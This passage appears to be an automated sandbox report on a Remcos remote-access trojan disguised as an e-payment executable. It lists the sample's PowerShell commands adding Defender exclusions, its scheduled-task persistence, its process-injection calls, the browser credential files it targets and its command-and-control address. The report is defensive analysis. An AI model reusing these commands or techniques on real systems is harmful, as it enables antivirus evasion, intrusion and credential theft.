            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe Code function: 13_2_004011A3 mov eax, dword ptr fs:[00000030h] 13_2_004011A3
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe"
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe"
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe Code function: 13_2_0040D477 _EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread, 13_2_0040D477
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe Memory written: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe Memory written: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpD623.tmp"
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe Process created: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe "C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe"
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpE7F6.tmp"
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe Process created: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe "C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe"
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: addnew|cmd|banksy|cmd|928100/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|1.7 Pro|cmd|C:\Users\user\AppData\Roaming\egsy\logs.dat|cmd|C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe|cmd||cmd|Program Manager|cmd|1|cmd|169|cmd|1957304987|cmd|1|cmd|62.102.148.166|cmd|remcos_rpklfmytvoel
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managernagercmd|bank
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cmd|banksy|cmd|928100/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|1.7 Pro|cmd|C:\Users\user\AppData\Roaming\egsy\logs.dat|cmd|C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe|cmd||cmd|Program Manager|cmd|1|cmd|169
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cmd|banksy|cmd|928100/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|1.7 Pro|cmd|C:\Users\user\AppData\Roaming\egsy\logs.dat|cmd|C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe|cmd||cmd|Program Manager|cmd|1|cmd|
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cmd|banksy|cmd|928100/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|1.7 Pro|cmd|C:\Users\user\AppData\Roaming\egsy\logs.dat|cmd|C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe|cmd||cmd|Program Manager|cmd|1|cmd|169|cmd|1957304987|cmd|1|cmd|62.102.148.166|cmd|
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cmd|banksy|cmd|928100/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|1.7 Pro|cmd|C:\Users\user\AppData\Roaming\egsy\logs.dat|cmd|C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe|cmd||cmd|Program Manager|cmd|1|cmd|169|cmd|1957304987|cmd|dnesdayThuThursdayFriFri88
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managernafor t)|cmd||cmd
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager100/
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerna 10 Enterprise (
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerpklfmytvo
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cmd|banksy|cmd|928100/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|1.7 Pro|cmd|C:\Users\user\AppData\Roaming\egsy\logs.dat|cmd|C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe|cmd||cmd|Program Manager|cmd|1|cmd|169|cmd|1957304987|cmd|1@Q
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cmd|banksy|cmd|928100/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|1.7 Pro|cmd|C:\Users\user\AppData\Roaming\egsy\logs.dat|cmd|C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe|cmd||cmd|Program Manager|cmd|1|cmd|169|cmd|ry:Ma
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManageranagerYqH4
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmd|banksy|cmd|928100/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|1.7 Pro|cmd|C:\Users\user\AppData\Roaming\egsy\logs.dat|cmd|C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe|cmd||cmd|Program Manager|cmd|1|cmd|169|cmd|1957304987|cmd|1|cmd|
            Source: logs.dat.8.drBinary or memory string: [ Program Manager ]
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manageranager|Windows
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmd|banksy|cmd|928100/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|1.7 Pro|cmd|C:\Users\user\AppData\Roaming\egsy\logs.dat|cmd|C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe|cmd||cmd|Program Manager|cmd|1|cmd|169|cmd|1957304987|cmd|1|cmd|62.102.148.166|cmd|remcos_rpklfmytvo
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmd|banksy|cmd|928100/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|1.7 Pro|cmd|C:\Users\user\AppData\Roaming\egsy\logs.dat|cmd|C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe|cmd||cmd|Program Manager|cmd|1|cmd|169|cmd|1957304987
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmd|banksy|cmd|928100/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|1.7 Pro|cmd|C:\Users\user\AppData\Roaming\egsy\logs.dat|cmd|C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe|cmd||cmd|Program Manager
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmd|banksy|cmd|928100/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|1.7 Pro|cmd|C:\Users\user\AppData\Roaming\egsy\logs.dat|cmd|C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe|cmd||cmd|Program Manager|cmd|1H
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerna64 bit)|cmd||cmd
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmd|banksy|cmd|928100/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|1.7 Pro|cmd|C:\Users\user\AppData\Roaming\egsy\logs.dat|cmd|C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe|cmd||cmd|Program Manager|cmd|1|cmd|169|cmd|1957304987|cmd|1|cmd|62.102.148.166
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManageranagerZZ
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845599217.0000000003015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmd|banksy|cmd|928100/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|1.7 Pro|cmd|C:\Users\user\AppData\Roaming\egsy\logs.dat|cmd|C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe|cmd||cmd|Program Manager|cmd|edWednesdayThuThursday$
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe, Code function: 13_2_0040818A GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,13_2_0040818A
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe, Queries volume information: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe VolumeInformation
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe, Queries volume information: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe, Code function: 13_2_00402832 Sleep,GetLocalTime,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,printf,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,13_2_00402832
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe, Code function: 13_2_0040E549 GetUserNameW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,13_2_0040E549
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match, File source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 13.2.JXHPwNYzysUjKo.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 13.2.JXHPwNYzysUjKo.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000009.00000002.1446098727.00000000038AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000D.00000002.1424435810.00000000025D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.3845599217.0000000003010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.1444552308.0000000002899000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000002.1411266191.000000000373C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000002.1409996431.0000000002729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: e-Payment.NET.CMS4006975815.exe PID: 7552, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: e-Payment.NET.CMS4006975815.exe PID: 7948, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: JXHPwNYzysUjKo.exe PID: 8008, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: JXHPwNYzysUjKo.exe PID: 7240, type: MEMORYSTR
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe, Code function: 13_2_00405622 \AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe, Code function: 13_2_004057B6 \AppData\Roaming\Mozilla\Firefox\Profiles\
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe, Code function: 13_2_004057B6 \key3.db

            Remote Access Functionality

            Source: e-Payment.NET.CMS4006975815.exe, 00000000.00000002.1409996431.0000000002729000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: Remcos_Mutex_Inj
            Source: e-Payment.NET.CMS4006975815.exe, 00000000.00000002.1409996431.0000000002729000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: \uninstall.batEXEpathC:\WINDOWS\system32\userinit.exeexplorer.exeupdate.batAppDataProgramFiles\SysWOW64\system32WinDirSystemDrive@@ (32 bit) (64 bit)SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameInjRemcos_Mutex_InjSoftware\SetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWIsWow64Processkernel32kernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\SETTINGS
            Source: e-Payment.NET.CMS4006975815.exe, 00000000.00000002.1411266191.000000000373C000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: Remcos_Mutex_Inj
            Source: e-Payment.NET.CMS4006975815.exe, 00000000.00000002.1411266191.000000000373C000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: \uninstall.batEXEpathC:\WINDOWS\system32\userinit.exeexplorer.exeupdate.batAppDataProgramFiles\SysWOW64\system32WinDirSystemDrive@@ (32 bit) (64 bit)SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameInjRemcos_Mutex_InjSoftware\SetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWIsWow64Processkernel32kernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\SETTINGS
            Source: JXHPwNYzysUjKo.exe, 00000009.00000002.1446098727.00000000038AA000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: Remcos_Mutex_Inj
            Source: JXHPwNYzysUjKo.exe, 00000009.00000002.1446098727.00000000038AA000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: \uninstall.batEXEpathC:\WINDOWS\system32\userinit.exeexplorer.exeupdate.batAppDataProgramFiles\SysWOW64\system32WinDirSystemDrive@@ (32 bit) (64 bit)SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameInjRemcos_Mutex_InjSoftware\SetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWIsWow64Processkernel32kernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\SETTINGS
            Source: JXHPwNYzysUjKo.exe, 00000009.00000002.1444552308.0000000002899000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: Remcos_Mutex_Inj
            Source: JXHPwNYzysUjKo.exe, 00000009.00000002.1444552308.0000000002899000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: \uninstall.batEXEpathC:\WINDOWS\system32\userinit.exeexplorer.exeupdate.batAppDataProgramFiles\SysWOW64\system32WinDirSystemDrive@@ (32 bit) (64 bit)SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameInjRemcos_Mutex_InjSoftware\SetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWIsWow64Processkernel32kernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\SETTINGS
            Source: JXHPwNYzysUjKo.exe, String found in binary or memory: Remcos_Mutex_Inj
            Source: JXHPwNYzysUjKo.exe, 0000000D.00000002.1424275604.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: Remcos_Mutex_InjO
            Source: JXHPwNYzysUjKo.exe, 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String found in binary or memory: Remcos_Mutex_Inj
            Source: JXHPwNYzysUjKo.exe, 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String found in binary or memory: \uninstall.batEXEpathC:\WINDOWS\system32\userinit.exeexplorer.exeupdate.batAppDataProgramFiles\SysWOW64\system32WinDirSystemDrive@@ (32 bit) (64 bit)SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameInjRemcos_Mutex_InjSoftware\SetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWIsWow64Processkernel32kernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\SETTINGS
            Source: Yara match, File source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 13.2.JXHPwNYzysUjKo.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 13.2.JXHPwNYzysUjKo.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000009.00000002.1446098727.00000000038AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000D.00000002.1424435810.00000000025D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.3845599217.0000000003010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.1444552308.0000000002899000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000002.1411266191.000000000373C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000002.1409996431.0000000002729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: e-Payment.NET.CMS4006975815.exe PID: 7552, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: e-Payment.NET.CMS4006975815.exe PID: 7948, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: JXHPwNYzysUjKo.exe PID: 8008, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: JXHPwNYzysUjKo.exe PID: 7240, type: MEMORYSTR
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: cmd.exe13_2_0040E8B9
